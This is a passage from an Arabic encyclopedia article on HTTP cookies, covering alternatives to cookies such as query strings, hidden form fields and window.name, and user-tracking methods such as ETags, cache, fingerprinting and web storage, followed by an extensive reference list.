تتشابه هذه الأنواع من سلاسل الاستعلام إلى حد كبير مع ملفات تعريف الارتباط من حيث أن كلاهما يحتوي على قطع عشوائية من المعلومات يختارها الخادم ويتم إرسالهما مرة أخرى إلى الخادم في كل طلب. ومع ذلك، هناك بعض الاختلافات. نظرًا لأن سلسلة الاستعلام هي جزء من عنوان محدد موقع الموارد الموحد، فإذا تمت إعادة استخدام هذا العنوان لاحقًا، فسيتم إرسال نفس قطعة المعلومات المرفقة إلى الخادم، مما قد يؤدي إلى حدوث ارتباك. على سبيل المثال، إذا تم ترميز تفضيلات المستخدم في سلسلة الاستعلام الخاصة بعنوان محدد موقع الموارد الموحد وقام المستخدم بإرسال هذا العنوان إلى مستخدم آخر عبر البريد الإلكتروني، فسيتم استخدام هذه التفضيلات لهذا المستخدم الآخر أيضًا.

علاوة على ذلك، إذا قام نفس المستخدم بالوصول إلى نفس الصفحة عدة مرات من مصادر مختلفة، فلا يوجد ما يضمن استخدام نفس سلسلة الاستعلام في كل مرة. على سبيل المثال، إذا قام أحد المستخدمين بزيارة صفحة ما من خلال القدوم من صفحة داخلية للموقع في المرة الأولى، ثم قام بزيارة نفس الصفحة من خلال القدوم من محرك بحث خارجي في المرة الثانية، فمن المحتمل أن تكون سلاسل الاستعلام مختلفة. إذا تم استخدام ملفات تعريف الارتباط في هذه الحالة، فستكون ملفات تعريف الارتباط هي نفسها.

ترتبط العيوب الأخرى لسلاسل الاستعلام بالأمان. يؤدي تخزين البيانات التي تحدد جلسة في سلسلة استعلام إلى تمكين هجمات تثبيت الجلسة وهجمات تسجيل المرجع واستغلالات أمنية أخرى. يعد نقل معرفات الجلسة كملفات تعريف ارتباط بروتوكول نقل النص الفائق أكثر أمانًا.

حقول النموذج المخفية

شكل آخر لتتبع الجلسة هو استخدام نماذج الويب ذات الحقول المخفية. تتشابه هذه التقنية إلى حد كبير مع استخدام سلاسل استعلام محدد موقع الموارد الموحد لحفظ المعلومات ولها العديد من المزايا والعيوب نفسها. في الواقع، إذا تم التعامل مع النموذج باستخدام طريقة HTTP GET، فإن هذه التقنية تشبه استخدام سلاسل استعلام محدد موقع الموارد الموحد، حيث تضيف طريقة GET حقول النموذج إلى عنوان محدد موقع الموارد الموحد كسلسلة استعلام. ولكن يتم التعامل مع معظم النماذج باستخدام HTTP POST، مما يتسبب في إرسال معلومات النموذج، بما في ذلك الحقول المخفية، في نص طلب بروتوكول نقل النص الفائق، والذي لا يعد جزءًا من عنوان محدد موقع الموارد الموحد، ولا جزءًا من ملف تعريف الارتباط.

يقدم هذا النهج ميزتين من وجهة نظر المُتتبِّع. أولاً، وضع معلومات التتبُّع في نص طلب بروتوكول نقل النص الفائق بدلاً من عنوان محدد موقع الموارد الموحد يعني أنها لن تُلاحظ من قِبَل المستخدم العادي. ثانياً، لا تُنسَخ معلومات الجلسة عند نسخ المستخدم لعنوان محدد موقع الموارد الموحد (لإضافة الصفحة إلى المفضلة أو إرسالها عبر البريد الإلكتروني، على سبيل المثال).

خاصية دوم الخاصة بـwindow.name

يمكن لجميع متصفحات الويب الحالية تخزين كمية كبيرة إلى حد ما من البيانات (2–32) م/ب) عبر جافا سكريبت باستخدام خاصية دوم window.name. يمكن استخدام هذه البيانات بدلاً من ملفات تعريف الارتباط الخاصة بالجلسة. يمكن ربط هذه التقنية بكائنات جاسون/جافا سكريبت لتخزين مجموعات معقدة من متغيرات الجلسة على جانب العميل.

الجانب السلبي هو أن كل نافذة أو علامة تبويب منفصلة ستحتوي في البداية على خاصية window.name فارغة عند فتحها.

في بعض النواحي، قد يكون هذا أكثر أمانًا من ملفات تعريف الارتباط نظرًا لحقيقة أن محتوياته لا يتم إرسالها تلقائيًا إلى الخادم في كل طلب مثل ملفات تعريف الارتباط، وبالتالي فهو ليس عرضة لهجمات استنشاق ملفات تعريف الارتباط على الشبكة.

التتبع

عنوان بروتوكول الإنترنت

قد يتم تعقب بعض المستخدمين استنادًا إلى عنوان بروتوكول الإنترنت الخاص بالكمبيوتر الذي يطلب الصفحة. يعرف الخادم عنوان بروتوكول الإنترنت الخاص بالكمبيوتر الذي يقوم بتشغيل المتصفح (أو الوكيل، إذا تم استخدام أي منهما) ويمكنه نظريًا ربط جلسة المستخدم بهذا عنوان بروتوكول الإنترنت.

ومع ذلك، لا تعد عناوين بروتوكول الإنترنت بشكل عام طريقة موثوقة لتتبع جلسة أو تحديد هوية المستخدم. تم تصميم العديد من أجهزة الكمبيوتر لاستخدامها بواسطة مستخدم واحد، مثل أجهزة الكمبيوتر المكتبية أو المنزلية، خلف مترجم عناوين الشبكة (NAT). وهذا يعني أن العديد من أجهزة الكمبيوتر ستشارك عنوان بروتوكول الإنترنت عامًا. علاوة على ذلك، تم تصميم بعض الأنظمة، مثل Tor، للحفاظ على إخفاء هوية المستخدم على الإنترنت، مما يجعل التتبع عن طريق عنوان بروتوكول الإنترنت غير عملي أو مستحيل أو يشكل خطرًا أمنيًا.

علامة إلكترونية

لأن المتصفح يُخزّن علامات إلكترونية مؤقتًا، ثم يُعاد مع الطلبات اللاحقة للمورد نفسه، يُمكن لخادم التتبع ببساطة تكرار أي علامة إلكترونية مُستقبَلة من المتصفح لضمان بقاء علامة إلكترونية المُخصّصة إلى أجل غير مُسمّى (على غرار ملفات تعريف الارتباط الدائمة). كما يُمكن لحقول رأس التخزين المؤقت الإضافية أن تُحسّن حفظ بيانات علامة إلكترونية.

يمكن مسح علامات إلكترونية في بعض المتصفحات عن طريق مسح ذاكرة التخزين المؤقت للمتصفح.

الذاكرة المخبأة للمتصفح

المقالة الرئيسة: ذاكرة مخبأة (ويب)

يمكن أيضًا استخدام ذاكرة التخزين المؤقت للمتصفح لتخزين معلومات تُستخدم لتتبّع المستخدمين الأفراد. تستفيد هذه التقنية من استخدام متصفح الويب للموارد المخزنة داخل ذاكرة التخزين المؤقت بدلًا من تنزيلها من موقع الويب عندما يتأكّد من أن ذاكرة التخزين المؤقت تحتوي بالفعل على أحدث إصدار من المورد.

على سبيل المثال، يمكن لموقع ويب تقديم ملف جافا سكريبت يحتوي على كود يحدد معرفًا فريدًا للمستخدم (على سبيل المثال، var userId = 3243242;). بعد الزيارة الأولية للمستخدم، في كل مرة يقوم فيها المستخدم بالوصول إلى الصفحة، سيتم تحميل هذا الملف من ذاكرة التخزين المؤقت بدلاً من تنزيله من الخادم. وبالتالي فإن محتواه لن يتغير أبدًا.

بصمة المتصفح

المقالة الرئيسة: بصمة الآلة

بصمة المتصفح هي معلومات يتم جمعها حول تكوين المتصفح، مثل رقم الإصدار ودقة الشاشة ونظام التشغيل، لغرض التعريف. يمكن استخدام بصمات الأصابع لتحديد هوية المستخدمين أو الأجهزة بشكل كامل أو جزئي حتى عندما يتم إيقاف تشغيل ملفات تعريف الارتباط.

لقد تم جمع معلومات تكوين متصفح الويب الأساسية منذ فترة طويلة بواسطة خدمات تحليلات الويب في محاولة لقياس حركة مرور الويب البشرية الحقيقية بدقة والتخلص من أشكال مختلفة من الاحتيال بالنقر. بمساعدة لغات البرمجة النصية الخاصة بالعميل، أصبح من الممكن جمع المزيد من المعلمات الغامضة.^[102][103] إن دمج مثل هذه المعلومات في سلسلة واحدة يشكل بصمة الجهاز. في عام 2010، قامت مؤسسة التخوم الإلكترونية بقياس ما لا يقل عن 18.1 بت من الإنتروبيا الممكنة من بصمة المتصفح.^[104] تزعم تقنية بصمة القماش  ^{[لغات أخرى]}‏، وهي تقنية أحدث، أنها تضيف 5.7 بت أخرى.

تخزين الويب

المقالة الرئيسة: تخزين الويب

تدعم بعض متصفحات الويب آليات الاستمرارية التي تسمح للصفحة بتخزين المعلومات محليًا لاستخدامها لاحقًا.

يتضمن معيار لغة تأشير النص الترابطي 5 (الذي تدعمه معظم متصفحات الويب الحديثة إلى حد ما) واجهة برمجة تطبيقات جافا سكريبت تسمى تخزين الويب والتي تسمح بنوعين من التخزين: التخزين المحلي وتخزين الجلسة. يتصرف التخزين المحلي بشكل مشابه لملفات تعريف الارتباط الدائمة بينما يتصرف تخزين الجلسة بشكل مشابه لملفات تعريف الارتباط للجلسة، باستثناء أن تخزين الجلسة مرتبط بفترة صلاحية علامة تبويب/نافذة فردية (المعروفة أيضًا باسم جلسة الصفحة)، وليس بجلسة متصفح كاملة مثل ملفات تعريف ارتباط الجلسة.^[105]

يدعم إنترنت إكسبلورر المعلومات المستمرة^[106] في سجل المتصفح، وفي مفضلات المتصفح، وفي مخزن XML («بيانات المستخدم»)، أو مباشرة داخل صفحة ويب محفوظة على القرص.

تتضمن بعض مكونات متصفح الويب آليات الثبات أيضًا. على سبيل المثال، يحتوي أدوبي فلاش على كائن مشترك محلي  ^{[لغات أخرى]}‏ ويحتوي مايكروسوفت سيلفرلايت على تخزين معزول.^[107]

انظر أيضًا

• جلسة (حاسوب)

المراجع

1. معجم مصطلحات المعلوماتية (بالعربية والإنجليزية)، دمشق: الجمعية العلمية السورية للمعلوماتية، 2000، ص. 126، OCLC:47938198، QID:Q108408025
2. منير البعلبكي؛ رمزي البعلبكي (2008). المورد الحديث: قاموس إنكليزي عربي (بالعربية والإنجليزية) (ط. 1). بيروت: دار العلم للملايين. ص. 271. ISBN:978-9953-63-541-5. OCLC:405515532. OL:50197876M. QID:Q112315598.
3. "What are cookies? What are the differences between them (session vs. persistent)?". Cisco (بالإنجليزية). 17 Jul 2018. 117925. Archived from the original on 2025-03-17.
4. Vamosi، Robert (14 أبريل 2008). "Gmail cookie stolen via Google Spreadsheets". News.cnet.com. مؤرشف من الأصل في 2013-12-09. اطلع عليه بتاريخ 2017-10-19.
5. "What about the "EU Cookie Directive"?". WebCookies.org. 2013. مؤرشف من الأصل في 2017-10-11. اطلع عليه بتاريخ 2017-10-19.
6. "New net rules set to make cookies crumble". BBC. 8 مارس 2011. مؤرشف من الأصل في 2018-08-10. اطلع عليه بتاريخ 2018-06-21.
7. "Sen. Rockefeller: Get Ready for a Real Do-Not-Track Bill for Online Advertising". Adage.com. 6 مايو 2011. مؤرشف من الأصل في 2011-08-24. اطلع عليه بتاريخ 2011-06-02.
8. "Where cookie comes from :: DominoPower". dominopower.com. مؤرشف من الأصل في 2017-10-19. اطلع عليه بتاريخ 2017-10-19.
9. Raymond، Eric (المحرر). "magic cookie". The Jargon File (version 4.4.7). مؤرشف من الأصل في 2017-09-06. اطلع عليه بتاريخ 2017-09-08.
10. Schwartz، John (4 سبتمبر 2001). "Giving Web a Memory Cost Its Users Privacy". The New York Times. مؤرشف من الأصل في 2011-11-18. اطلع عليه بتاريخ 2017-02-19.
11. Kesan، Jey؛ Shah، Rajiv (19 أغسطس 2018). "Deconstructing Code". Yale Journal of Law and Technology. ج. 6: 277–389. SSRN:597543.
12. Kristol، David M. (2001). "HTTP Cookies: Standards, Privacy, and Politics". ACM Transactions on Internet Technology. Association for Computing Machinery (ACM). ج. 1 ع. 2: 151–198. arXiv:cs/0105018. DOI:10.1145/502152.502153. ISSN:1533-5399. S2CID:1848140.
13. "Press Release: Netscape Communications Offers New Network Navigator Free On The Internet". مؤرشف من الأصل في 2006-12-07. اطلع عليه بتاريخ 2010-05-22.
14. "Usenet Post by Marc Andreessen: Here it is, world!". 13 أكتوبر 1994. مؤرشف من الأصل في 2011-04-27. اطلع عليه بتاريخ 2010-05-22.
15. US 5774670, Montulli, Lou, "Persistent client state in a hypertext transfer protocol based client-server system", published 1998-06-30, assigned to Netscape Communications Corp. 
16. Hardmeier، Sandi (25 أغسطس 2005). "The history of Internet Explorer". Microsoft. مؤرشف من الأصل في 2005-10-01. اطلع عليه بتاريخ 2009-01-04.
17. Miyazaki, Anthony D. (2008). "Online Privacy and the Disclosure of Cookie Use: Effects on Consumer Trust and Anticipated Patronage". Journal of Public Policy & Marketing (بالإنجليزية). 27 (1): 19–33. DOI:10.1509/jppm.27.1.19. ISSN:0743-9156. Archived from the original on 2025-03-08.
18. Jackson، T (12 فبراير 1996). "This Bug in Your PC is a Smart Cookie". Financial Times.
19. قالب:Cite ietf
20. "Setting Cookies". staff.washington.edu. 19 يونيو 2009. مؤرشف من الأصل في 2017-03-16. اطلع عليه بتاريخ 2017-03-15.
21. The edbrowse documentation version 3.5 said "Note that only Netscape-style cookies are supported. However, this is the most common flavor of cookie. It will probably meet your needs." This paragraph was removed in later versions of the documentation نسخة محفوظة 2017-03-16 على موقع واي باك مشين. further to RFC 2965's deprecation.
22. Hodges، Jeff؛ Corry، Bil (6 مارس 2011). "'HTTP State Management Mechanism' to Proposed Standard". The Security Practice. مؤرشف من الأصل في 2016-08-07. اطلع عليه بتاريخ 2016-06-17.
23. "Set-Cookie2 - HTTP | MDN". developer.mozilla.org. مؤرشف من الأصل في 2022-03-02. اطلع عليه بتاريخ 2021-03-08.
24. "Description of Persistent and Per-Session Cookies in Internet Explorer". support.microsoft.com. 24 يناير 2007. مؤرشف من الأصل في 2011-09-25.
25. "Maintaining session state with cookies". Microsoft Developer Network. مؤرشف من الأصل في 2012-10-14. اطلع عليه بتاريخ 2012-10-22.
26. Bujlow، Tomasz؛ Carela-Espanol، Valentin؛ Lee، Beom-Ryeol؛ Barlet-Ros، Pere (2017). "A Survey on Web Tracking: Mechanisms, Implications, and Defenses". Proceedings of the IEEE. ج. 105 ع. 8: 1476–1510. DOI:10.1109/JPROC.2016.2637878. hdl:2117/108437. ISSN:0018-9219. مؤرشف من الأصل في 2024-08-17.
27. Rasaii, Ali; Singh, Shivani; Gosain, Devashish; Gasser, Oliver (2023), Brunstrom, Anna; Flores, Marcel; Fiore, Marco (eds.), "Exploring the Cookieverse: A Multi-Perspective Analysis of Web Cookies", Passive and Active Measurement (بالإنجليزية), Cham: Springer Nature Switzerland, vol. 13882, pp. 623–651, DOI:10.1007/978-3-031-28486-1_26, ISBN:978-3-031-28485-4, Retrieved 2024-08-24
28. Bugliesi، Michele؛ Calzavara، Stefano؛ Focardi، Riccardo؛ Khan، Wilayat (16 سبتمبر 2015). "CookiExt: Patching the browser against session hijacking attacks". Journal of Computer Security. ج. 23 ع. 4: 509–537. DOI:10.3233/JCS-150529. hdl:10278/3663357.
29. "'SameSite' cookie attribute, Chrome Platform tatus". Chromestatus.com. مؤرشف من الأصل في 2016-05-09. اطلع عليه بتاريخ 2016-04-23.
30. Goodwin، M.؛ West (20 يونيو 2016). "Same-Site Cookies draft-ietf-httpbis-cookie-same-site-00". Ietf Datatracker. مؤرشف من الأصل في 2016-08-16. اطلع عليه بتاريخ 2016-07-28.
31. "Require "Secure" for "SameSite=None". by miketaylr · Pull Request #1323 · httpwg/http-extensions". GitHub (بالإنجليزية). Archived from the original on 2025-03-05. Retrieved 2021-04-05.
32. West، Mike؛ Wilander، John (7 ديسمبر 2020). Cookies: HTTP State Management Mechanism (Report). Internet Engineering Task Force. مؤرشف من الأصل في 2025-03-20.
33. "Browser Compatibility Testing of 'SameSite' cookie attribute". مؤرشف من الأصل في 2025-03-08.
34. "SameSite Cookie Changes in February 2020: What You Need to Know". Chromium Blog (بالإنجليزية). Archived from the original on 2025-04-28. Retrieved 2021-04-05.
35. "Temporarily rolling back SameSite Cookie Changes". Chromium Blog (بالإنجليزية). Archived from the original on 2025-04-28. Retrieved 2021-04-05.
36. Schuh, Justin (28 May 2020). "Resuming SameSite Cookie Changes in July". Chromium Blog (بالإنجليزية). Archived from the original on 2025-04-28. Retrieved 2024-02-18.
37. "Learn more about the Public Suffix List". Publicsuffix.org. مؤرشف من الأصل في 2016-05-14. اطلع عليه بتاريخ 2016-07-28.
38. Mayer، Jonathan (19 أغسطس 2011). "Tracking the Trackers: Microsoft Advertising". The Center for Internet and Society. مؤرشف من الأصل في 2011-09-26. اطلع عليه بتاريخ 2011-09-28.
39. Vijayan، Jaikumar (19 أغسطس 2011). "Microsoft disables 'supercookies' used on MSN.com visitors". Computerworld. مؤرشف من الأصل في 2014-11-27. اطلع عليه بتاريخ 2014-11-23.
40. Englehardt، Steven؛ Edelstein، Arthur (26 يناير 2021). "Firefox 85 Cracks Down on Supercookies". Mozilla Security Blog. مؤرشف من الأصل في 2024-02-25.
41. Angwin, Julia; Tigas, Mike (14 Jan 2015). "Zombie Cookie: The Tracking Cookie That You Can't Kill". ProPublica (بالإنجليزية). Archived from the original on 2025-03-08. Retrieved 2020-11-01.
42. Stolze, Conrad (11 Jun 2011). "The Cookie That Would Not Crumble!". 24x7 Magazine (بالإنجليزية الأمريكية). Archived from the original on 2025-01-09. Retrieved 2020-11-01.
43. Peng، Weihong؛ Cisna، Jennifer (2000). "HTTP Cookies, A Promising Technology". ProQuest. Online Information Review. بروكويست 194487945. {{استشهاد بدورية محكمة}}: templatestyles stripmarker في |المعرف= في مكان 1 (مساعدة)
44. Jim Manico quoting Daniel Stenberg, Real world cookie length limits نسخة محفوظة 2013-07-02 على موقع واي باك مشين.
45. Lee, Wei-Bin; Chen, Hsing-Bai; Chang, Shun-Shyan; Chen, Tzung-Her (25 Jan 2019). "Secure and efficient protection for HTTP cookies with self-verification". International Journal of Communication Systems (بالإنجليزية). 32 (2): e3857. DOI:10.1002/dac.3857. S2CID:59524143. Archived from the original on 2025-02-14.
46. Rainie, Lee (2012). Networked: The New Social Operating System. p. 237
47. قالب:Cite ietf
48. "Persistent client state HTTP cookies: Preliminary specification". Netscape. c. 1999. مؤرشف من الأصل في 2007-08-05.
49. "Cookie Property". MSDN. Microsoft. مؤرشف من الأصل في 2008-04-05. اطلع عليه بتاريخ 2009-01-04.
50. Shannon، Ross (26 فبراير 2007). "Cookies, Set and retrieve information about your readers". HTMLSource. مؤرشف من الأصل في 2011-08-24. اطلع عليه بتاريخ 2009-01-04.
51. قالب:Cite ietf
52. قالب:Cite ietf
53. قالب:Cite ietf
54. "Internet Explorer Cookie Internals (FAQ)". 21 نوفمبر 2018.
55. قالب:Cite ietf
56. قالب:Cite ietf
57. "Cookies specification compatibility in modern browsers". inikulin.github.io. 2016. مؤرشف من الأصل في 2016-10-02. اطلع عليه بتاريخ 2016-09-30.
58. Coles، Peter. "HTTP Cookies: What's the difference between Max-age and Expires? – Peter Coles". Mrcoles.com. مؤرشف من الأصل في 2016-07-29. اطلع عليه بتاريخ 2016-07-28.
59. Symantec Internet Security Threat Report: Trends for July–December 2007 (Executive Summary) (PDF) (Report). Symantec Corp. ج. XIII. أبريل 2008. ص. 1–3. مؤرشف من الأصل (PDF) في 2008-06-25. اطلع عليه بتاريخ 2008-05-11.
60. Whalen، David (8 يونيو 2002). "The Unofficial Cookie FAQ v2.6". Cookie Central. مؤرشف من الأصل في 2011-08-24. اطلع عليه بتاريخ 2009-01-04.
61. "How to Manage Cookies in Internet Explorer 6". Microsoft. 18 ديسمبر 2007. مؤرشف من الأصل في 2008-12-28. اطلع عليه بتاريخ 2009-01-04.
62. "Clearing private data". Firefox Support Knowledge base. Mozilla. 16 سبتمبر 2008. مؤرشف من الأصل في 2009-01-03. اطلع عليه بتاريخ 2009-01-04.
63. "Clear Personal Information : Clear browsing data". Google Chrome Help. مؤرشف من الأصل في 2009-03-11. اطلع عليه بتاريخ 2009-01-04.
64. "Clear Personal Information: Delete cookies". Google Chrome Help. مؤرشف من الأصل في 2009-03-11. اطلع عليه بتاريخ 2009-01-04.
65. "Third party domains". WebCookies.org. مؤرشف من الأصل في 2014-12-09. اطلع عليه بتاريخ 2014-12-07.
66. "Number of cookies". WebCookies.org. مؤرشف من الأصل في 2014-12-09. اطلع عليه بتاريخ 2014-12-07.
67. Statt, Nick (24 Mar 2020). "Apple updates Safari's anti-tracking tech with full third-party cookie blocking". The Verge (بالإنجليزية). Archived from the original on 2025-04-03. Retrieved 2020-07-24.
68. "Firefox starts blocking third-party cookies by default". VentureBeat (بالإنجليزية الأمريكية). 4 Jun 2019. Archived from the original on 2022-06-18. Retrieved 2020-07-24.
69. Brave (6 Feb 2020). "OK Google, don't delay real browser privacy until 2022". Brave Browser (بالإنجليزية الأمريكية). Archived from the original on 2024-03-02. Retrieved 2020-07-24.
70. Protalinski، Emil (19 مايو 2020). "Chrome 83 arrives with redesigned security settings, third-party cookies blocked in Incognito". VentureBeat. مؤرشف من الأصل في 2022-06-26. اطلع عليه بتاريخ 2020-06-25.
71. Amadeo, Ron (24 Apr 2024). "Google can't quit third-party cookies—delays shut down for a third time". Ars Technica (بالإنجليزية الأمريكية). Archived from the original on 2025-04-13. Retrieved 2024-04-25.
72. Lawler, Richard (22 Jul 2024). "Google's plan to turn off third-party cookies in Chrome is dying". The Verge (بالإنجليزية). Archived from the original on 2025-04-25. Retrieved 2024-07-29.
73. Miyazaki, Anthony D. (2008), "Online Privacy and the Disclosure of Cookie Use: Effects on Consumer Trust and Anticipated Patronage," Journal of Public Policy & Marketing, 23 (Spring), 19–33
74. "Spy Agency Removes Illegal Tracking Files". New York Times. 29 ديسمبر 2005. مؤرشف من الأصل في 2011-11-12. اطلع عليه بتاريخ 2017-02-19.
75. "EU Cookie Directive, Directive 2009/136/EC". JISC Legal Information. مؤرشف من الأصل في 2012-12-18. اطلع عليه بتاريخ 2012-10-31.
76. Privacy and Electronic Communications Regulations. Information Commissioner's Office. 2012. مؤرشف من الأصل في 2012-10-30. اطلع عليه بتاريخ 2012-10-31.
77. "Cookies and similar technologies". ico.org.uk (بالإنجليزية). 1 Jan 2021. Archived from the original on 2023-05-19. Retrieved 2021-06-06.
78. "EUR-Lex - 62017CN0673 - EN - EUR-Lex". eur-lex.europa.eu. مؤرشف من الأصل في 2025-03-08. اطلع عليه بتاريخ 2021-06-06.
79. Veale، Michael؛ Zuiderveen Borgesius، Frederik (1 أبريل 2021)، Adtech and Real-Time Bidding under European Data Protection Law، DOI:10.31235/osf.io/wg8fq، hdl:2066/253518، S2CID:243311598، مؤرشف من الأصل في 2025-02-13
80. Zuiderveen Borgesius, Frederik J. (Aug 2015). "Personal data processing for behavioural targeting: which legal basis?". International Data Privacy Law (بالإنجليزية). 5 (3): 163–176. DOI:10.1093/idpl/ipv011. ISSN:2044-3994.
81. Nouwens, Midas; Liccardi, Ilaria; Veale, Michael; Karger, David; Kagal, Lalana (21 Apr 2020). "Dark Patterns after the GDPR: Scraping Consent Pop-ups and Demonstrating their Influence". Proceedings of the 2020 CHI Conference on Human Factors in Computing Systems. Chi '20 (بالإنجليزية). Honolulu HI USA: ACM. pp. 1–13. arXiv:2001.02479. DOI:10.1145/3313831.3376321. hdl:1721.1/129999. ISBN:978-1-4503-6708-0. S2CID:210064317.
82. "EUR-Lex - 32016R0679 - EN - EUR-Lex". eur-lex.europa.eu (بالإنجليزية). Archived from the original on 2025-04-28. Retrieved 2021-06-06.
83. Information Commissioner's Office (2019). Update Report into Adtech and Real Time Bidding (PDF). مؤرشف (PDF) من الأصل في 2021-05-13.
84. "Délibération n° 2019-093 du 4 juillet 2019 portant adoption de lignes directrices relatives à l'application de l'article 82 de la loi du 6 janvier 1978 modifiée aux opérations de lecture ou écriture dans le terminal d'un utilisateur (notamment aux cookies et autres traceurs) (rectificatif)". www.legifrance.gouv.fr. مؤرشف من الأصل في 2025-02-12. اطلع عليه بتاريخ 2021-06-06.
85. "EUR-Lex - 62017CC0040 - EN - EUR-Lex". eur-lex.europa.eu. مؤرشف من الأصل في 2025-02-13. اطلع عليه بتاريخ 2021-06-06.
86. "EU cookie law: stop whining and just get on with it". Wired UK. 24 مايو 2012. مؤرشف من الأصل في 2012-11-15. اطلع عليه بتاريخ 2012-10-31.
87. Kampanos، Georgios؛ Shahandashti، Siamak F. (2021). "Accept All: The Landscape of Cookie Banners in Greece and the UK". ICT Systems Security and Privacy Protection. IFIP Advances in Information and Communication Technology. Cham: Springer International Publishing. ج. 625. ص. 213–227. arXiv:2104.05750. DOI:10.1007/978-3-030-78120-0_14. ISBN:978-3-030-78119-4. ISSN:1868-4238. S2CID:233219491.
88. Santos, Cristiana; Nouwens, Midas; Toth, Michael; Bielova, Nataliia; Roca, Vincent (2021), Gruschka, Nils; Antunes, Luís Filipe Coelho; Rannenberg, Kai; Drogkaris, Prokopios (eds.), "Consent Management Platforms Under the GDPR: Processors and/Or Controllers?", Privacy Technologies and Policy, Lecture Notes in Computer Science (بالإنجليزية), Cham: Springer International Publishing, vol. 12703, pp. 47–69, arXiv:2104.06861, DOI:10.1007/978-3-030-76663-4_3, ISBN:978-3-030-76662-7, S2CID:233231428, Retrieved 2021-06-06
89. "P3P: The Platform for Privacy Preferences". W3C. مؤرشف من الأصل في 2025-01-30. اطلع عليه بتاريخ 2021-10-15.
90. Zuiderveen Borgesius، F.J.؛ Kruikemeier، S.؛ C Boerman، S.؛ Helberger، N. (2017). "Tracking Walls, Take-It-Or-Leave-It Choices, the GDPR, and the ePrivacy Regulation". European Data Protection Law Review. ج. 3 ع. 3: 353–368. DOI:10.21552/edpl/2017/3/9. hdl:11245.1/dfb59b54-0544-4c65-815a-640eae10668a. مؤرشف من الأصل في 2025-04-13.
91. "Guidelines 05/2020 on consent under Regulation 2016/679 | European Data Protection Board". edpb.europa.eu. مؤرشف من الأصل في 2025-04-25. اطلع عليه بتاريخ 2021-06-06.
92. "A Loophole Big Enough for a Cookie to Fit Through". Bits. The New York Times. 17 سبتمبر 2010. مؤرشف من الأصل في 2013-01-26. اطلع عليه بتاريخ 2013-01-31.
93. Pegoraro، Rob (17 يوليو 2005). "How to Block Tracking Cookies". Washington Post. ص. F07. مؤرشف من الأصل في 2011-04-27. اطلع عليه بتاريخ 2009-01-04.
94. Claburn, Thomas. "What's CNAME of your game? This DNS-based tracking defies your browser privacy defenses". www.theregister.com (بالإنجليزية). San Francisco. Archived from the original on 2025-03-15. Retrieved 2021-06-06.
95. A bot will complete this citation soon. Click here to jump the queue أرخايف:2102.09301.
96. Zetter، Kim (23 مارس 2011). "Hack Obtains 9 Bogus Certificates for Prominent Websites; Traced to Iran - Threat Level - Wired.com". Threat Level. مؤرشف من الأصل في 2014-03-26.
97. Finkle، Jim (25 مايو 2011). "Microsoft latest security risk: 'Cookiejacking'". Reuters. مؤرشف من الأصل في 2011-05-30. اطلع عليه بتاريخ 2011-05-26.
98. Whitney، Lance (26 مايو 2011). "Security researcher finds 'cookiejacking' risk in IE". CNET. مؤرشف من الأصل في 2011-06-14. اطلع عليه بتاريخ 2019-09-06.
99. Fielding، Roy (2000). "Fielding Dissertation: CHAPTER 6: Experience and Evaluation". مؤرشف من الأصل في 2011-04-27. اطلع عليه بتاريخ 2010-10-14.
100. Tilkov، Stefan (2 يوليو 2008). "REST Anti-Patterns". InfoQ. مؤرشف من الأصل في 2008-12-23. اطلع عليه بتاريخ 2009-01-04.
101. Hoffman, Chris (28 Sep 2016). "What Is a Browser Cookie?". How-To Geek (بالإنجليزية الأمريكية). Archived from the original on 2025-04-06. Retrieved 2021-04-03.
102. "BrowserSpy". gemal.dk. مؤرشف من الأصل في 2008-09-26. اطلع عليه بتاريخ 2010-01-28.
103. "IE "default behaviors [sic]" browser information disclosure tests: clientCaps". Mypage.direct.ca. مؤرشف من الأصل في 2011-06-05. اطلع عليه بتاريخ 2010-01-28.
104. Eckersley، Peter (17 مايو 2010). "How Unique Is Your Web Browser?" (PDF). eff.org. Electronic Frontier Foundation. مؤرشف من الأصل (PDF) في 2014-10-15. اطلع عليه بتاريخ 2014-07-23.
105. "Window.sessionStorage, Web APIs | MDN". developer.mozilla.org. مؤرشف من الأصل في 2015-09-28. اطلع عليه بتاريخ 2015-10-02.
106. "Introduction to Persistence". microsoft.com. Microsoft. مؤرشف من الأصل في 2015-01-11. اطلع عليه بتاريخ 2014-10-09.
107. "Isolated Storage". Microsoft.com. مؤرشف من الأصل في 2014-12-16. اطلع عليه بتاريخ 2014-10-09.

المصادر

• Anonymous, 2011. Cookiejacking Attack Steals Website Access Credentials. Informationweek - Online, pp. Informationweek - Online, May 26, 2011.

وصلات خارجية

استمع إلى هذه المقالة (1 ساعة and 1 دقيقة)

noicon

 

هذا الملف الصوتي أُنشئ من نسخة هذه المقالة المؤرخة في 28 مايو 2016 (2016-05-28)، ولا يعكس التغييرات التي قد تحدث للمقالة بعد هذا التاريخ.

(مساعدة الوسائط · مقالات مسموعة أخرى)

• RFC 6265, the current official specification for HTTP cookies
• HTTP cookies, Mozilla Developer Network
• Using cookies via ECMAScript, Mozilla Developer Network
• How Internet Cookies Work at هاو ستف ووركس
• Cookies at the Electronic Privacy Information Center (EPIC)
• Mozilla Knowledge-Base: Cookies
• Cookie Domain, explain in detail how cookie domains are handled in current major browsers
• Cookie Stealing - Michael Pound
• Check cookies for compliance with EU cookie directive

 

في كومنز مواد ذات صلة بـ ملف تعريف ارتباط.

•  بوابة أمن المعلومات
•  بوابة إنترنت
•  بوابة اتصال عن بعد
•  بوابة برمجة الحاسوب
•  بوابة برمجيات